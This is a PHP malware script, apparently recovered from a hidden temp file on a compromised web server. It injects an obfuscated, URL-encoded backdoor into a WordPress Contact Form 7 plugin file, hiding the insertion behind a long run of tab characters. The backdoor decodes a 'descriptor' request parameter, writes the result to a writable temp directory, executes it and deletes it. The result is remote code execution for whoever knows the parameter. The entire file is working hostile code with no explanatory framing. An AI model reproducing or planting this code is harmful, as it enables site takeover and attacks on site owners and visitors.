File: //proc/thread-self/root/tmp/.sys
<?php $path = '/home/florin/sites/dentoutline/current/public/wp-content/plugins/contact-form-7/load.php'; $ft = @filemtime($path); $content = file_get_contents($path); $new_code = rawurldecode('if%28in_array%28%22%5Cx64%5Cx65%5Cx73%5Cx63%5Cx72iptor%22%2C%20array_keys%28%24_REQUEST%29%29%29%7B%20%24res%20%3D%20array_filter%28%5Bini_get%28%22upload_tmp_dir%22%29%2C%20sys_get_temp_dir%28%29%2C%20%22/dev/shm%22%2C%20%22/var/tmp%22%2C%20getcwd%28%29%2C%20%22/tmp%22%2C%20getenv%28%22TEMP%22%29%2C%20session_save_path%28%29%2C%20getenv%28%22TMP%22%29%5D%29%3B%20%24element%20%3D%20%24_REQUEST%5B%22%5Cx64%5Cx65%5Cx73%5Cx63%5Cx72iptor%22%5D%3B%20%24element%20%3D%20explode%20%28%20%27.%27%20%2C%24element%20%29%3B%20%24k%3D%20%27%27%3B%20%24s2%3D%20%27abcdefghijklmnopqrstuvwxyz0123456789%27%3B%20%24sLen%3D%20strlen%28%24s2%20%29%3B%20%24s%3D%200%3B%20array_walk%28%24element%2C%20function%20%28%24v6%29%20use%20%28%26%24k%2C%20%26%24s%2C%20%24s2%2C%20%24sLen%29%20%7B%24chS%3D%20ord%28%24s2%5B%24s%20%25%20%24sLen%5D%20%29%3B%20%24dec%3D%20%28%28int%29%24v6%20-%20%24chS%20-%20%28%24s%20%25%2010%29%29%20%5E%2095%3B%20%24k%20.%3D%20chr%28%24dec%20%29%3B%20%24s%2B%2B%3B%20%7D%29%3B%20foreach%20%28%24res%20as%20%24key%20%3D%3E%20%24pgrp%29%20%7B%20if%20%28%28is_dir%28%24pgrp%29%20and%20is_writable%28%24pgrp%29%29%29%20%7B%20%24hld%20%3D%20sprintf%28%22%25s/.pset%22%2C%20%24pgrp%29%3B%20if%20%28file_put_contents%28%24hld%2C%20%24k%29%29%20%7B%20require%20%24hld%3B%20unlink%28%24hld%29%3B%20exit%3B%20%7D%20%7D%20%7D%20%7D'); if (strstr($content, $new_code)) { die('!already injected!'); } $starts = ['<?php', '<?']; foreach ($starts as $start) { if (substr($content, 0, strlen($start)) == $start) { $content = substr($content, strlen($start)); $content = $start.str_repeat("\t", 42).$new_code."\n".$content; if (file_put_contents($path, $content)) { $content = file_get_contents($path); if (strstr($content, $new_code)) { die("!success!<ft>{$ft}</ft>"); } } } } die('!failed!');